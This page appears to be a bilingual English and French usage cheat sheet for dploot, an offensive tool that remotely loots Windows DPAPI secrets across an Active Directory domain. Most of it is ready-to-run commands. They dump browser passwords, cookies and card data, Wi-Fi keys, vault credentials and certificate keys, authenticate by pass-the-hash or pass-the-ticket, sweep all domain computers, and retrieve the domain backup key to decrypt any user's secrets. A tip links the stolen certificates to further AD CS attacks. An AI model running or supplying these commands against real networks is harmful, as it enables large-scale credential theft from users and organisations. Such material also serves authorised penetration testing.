dploot
Outil de pillage DPAPI pour les environnements Active Directory. Extrait à distance les identifiants de navigateurs, les mots de passe Wi-Fi, les certificats et les secrets DPAPI via SMB. DPAPI looter for Active Directory environments. Remotely dumps browser credentials, Wi-Fi passwords, certificates, and DPAPI secrets via SMB.
↗ https://github.com/zblurx/dplootOverview
dploot automates DPAPI (Data Protection API) secret extraction across an Active Directory domain. It can remotely dump browser saved passwords (Chrome, Edge), Wi-Fi credentials, certificates, vault credentials, and scheduled task passwords — all without touching disk on the target.
Authentication Methods
Username + password
dploot computers -d domain.local -u user -p 'password' -t 10.10.10.1
Pass-the-hash
dploot computers -d domain.local -u user -H :NTLMhash -t 10.10.10.1
# Pass-the-ticket (with KRB5CCNAME)
export KRB5CCNAME=/tmp/user.ccache
dploot computers -d domain.local -k -t 10.10.10.1
Dumping Credentials
Browser credentials (Chrome, Edge, Firefox)
dploot browser -d domain.local -u admin -p 'password' -t 10.10.10.1
Browser cookies
dploot browser -d domain.local -u admin -p 'password' -t 10.10.10.1 --cookies
Wi-Fi credentials
dploot wifi -d domain.local -u admin -p 'password' -t 10.10.10.1
Vault credentials (Windows Credential Manager)
dploot vaults -d domain.local -u admin -p 'password' -t 10.10.10.1
Certificate private keys
dploot certificates -d domain.local -u admin -p 'password' -t 10.10.10.1
Scheduled task credentials
dploot triage -d domain.local -u admin -p 'password' -t 10.10.10.1
All (triage = dump everything)
dploot triage -d domain.local -u admin -p 'password' -t 10.10.10.1
Domain-Wide Dumping
Dump from all computers in the domain
dploot computers -d domain.local -u admin -p 'password'
Then dump browser creds from all
dploot browser -d domain.local -u admin -p 'password'
Limit to specific target
dploot browser -d domain.local -u admin -p 'password' -t dc01.domain.local
DPAPI Masterkey Recovery
Backup operator masterkeys (from Domain Controller)
dploot backupkey -d domain.local -u admin -p 'password' -t dc01.domain.local
With domain backup key, decrypt any masterkey offline
dploot masterkeys -d domain.local -u user -p 'pass' -t 10.10.10.1 \
--pvkfile domain_backup.pvk
Decrypt blobs offline with masterkeys
dploot blob -d domain.local --masterkeys masterkeys.json -t 10.10.10.1
Output
Save output to directory
dploot triage -d domain.local -u admin -p 'password' -t 10.10.10.1 -o /tmp/loot/
JSON output
dploot browser -d domain.local -u admin -p 'password' -t 10.10.10.1 --json
Tips
- Requires local admin access on the target machine
- The Domain backup key (
dploot backupkey) can decrypt ANY user’s DPAPI masterkeys — very powerful - Browser credentials include saved passwords, credit cards, and autofill data
- Certificates found may be usable for AD CS attacks (Certipy / PKINIT authentication)
Command reference
dploot [module] [options]
Modules:
triage Dump all DPAPI secrets
browser Browser credentials + cookies
wifi Wi-Fi passwords
vaults Credential Manager vaults
certificates Certificate private keys
masterkeys Decrypt masterkey files
backupkey Retrieve domain backup key from DC
blob Decrypt DPAPI blob
computers Enumerate domain computers
Common options:
-d DOMAIN Domain name
-u USER Username
-p PASSWORD Password
-H HASH NTLM hash
-k Kerberos auth (KRB5CCNAME)
-t TARGET Target host (IP or hostname)
-o DIR Output directory
--json JSON output
--debug Debug mode
Vue d’ensemble
dploot automatise l’extraction des secrets DPAPI (Data Protection API) à travers un domaine Active Directory. Il peut extraire à distance les mots de passe sauvegardés dans les navigateurs (Chrome, Edge), les identifiants Wi-Fi, les certificats, les identifiants du coffre-fort Windows, et les mots de passe des tâches planifiées, le tout sans toucher le disque de la cible.
Méthodes d’authentification
# Nom d'utilisateur + mot de passe
dploot computers -d domain.local -u user -p 'password' -t 10.10.10.1
# Pass-the-hash
dploot computers -d domain.local -u user -H :NTLMhash -t 10.10.10.1
# Pass-the-ticket (avec KRB5CCNAME)
export KRB5CCNAME=/tmp/user.ccache
dploot computers -d domain.local -k -t 10.10.10.1
Extraction des identifiants
# Identifiants de navigateur (Chrome, Edge, Firefox)
dploot browser -d domain.local -u admin -p 'password' -t 10.10.10.1
# Cookies de navigateur
dploot browser -d domain.local -u admin -p 'password' -t 10.10.10.1 --cookies
# Identifiants Wi-Fi
dploot wifi -d domain.local -u admin -p 'password' -t 10.10.10.1
# Identifiants du coffre-fort (Gestionnaire d'identifiants Windows)
dploot vaults -d domain.local -u admin -p 'password' -t 10.10.10.1
# Clés privées de certificats
dploot certificates -d domain.local -u admin -p 'password' -t 10.10.10.1
# Identifiants de tâches planifiées
dploot triage -d domain.local -u admin -p 'password' -t 10.10.10.1
# Tout (triage = tout extraire)
dploot triage -d domain.local -u admin -p 'password' -t 10.10.10.1
Extraction à l’échelle du domaine
# Extraire depuis tous les ordinateurs du domaine
dploot computers -d domain.local -u admin -p 'password'
# Puis extraire les identifiants de navigateur de tous
dploot browser -d domain.local -u admin -p 'password'
# Limiter à une cible spécifique
dploot browser -d domain.local -u admin -p 'password' -t dc01.domain.local
Récupération de masterkeys DPAPI
# Clé de sauvegarde des opérateurs de sauvegarde (depuis le contrôleur de domaine)
dploot backupkey -d domain.local -u admin -p 'password' -t dc01.domain.local
# Avec la clé de sauvegarde du domaine, déchiffrer n'importe quelle masterkey hors ligne
dploot masterkeys -d domain.local -u user -p 'pass' -t 10.10.10.1 \
--pvkfile domain_backup.pvk
# Déchiffrer des blobs hors ligne avec les masterkeys
dploot blob -d domain.local --masterkeys masterkeys.json -t 10.10.10.1
Sortie
# Sauvegarder la sortie dans un répertoire
dploot triage -d domain.local -u admin -p 'password' -t 10.10.10.1 -o /tmp/loot/
# Sortie JSON
dploot browser -d domain.local -u admin -p 'password' -t 10.10.10.1 --json
Conseils
- Nécessite un accès admin local sur la machine cible
- La clé de sauvegarde de domaine (
dploot backupkey) peut déchiffrer les masterkeys DPAPI de N’IMPORTE QUEL utilisateur : très puissant - Les identifiants de navigateur incluent les mots de passe sauvegardés, les cartes bancaires et les données de remplissage automatique
- Les certificats trouvés peuvent être utilisables pour des attaques AD CS (Certipy / authentification PKINIT)
Référence des commandes
dploot [module] [options]
Modules:
triage Dump all DPAPI secrets
browser Browser credentials + cookies
wifi Wi-Fi passwords
vaults Credential Manager vaults
certificates Certificate private keys
masterkeys Decrypt masterkey files
backupkey Retrieve domain backup key from DC
blob Decrypt DPAPI blob
computers Enumerate domain computers
Common options:
-d DOMAIN Domain name
-u USER Username
-p PASSWORD Password
-H HASH NTLM hash
-k Kerberos auth (KRB5CCNAME)
-t TARGET Target host (IP or hostname)
-o DIR Output directory
--json JSON output
--debug Debug mode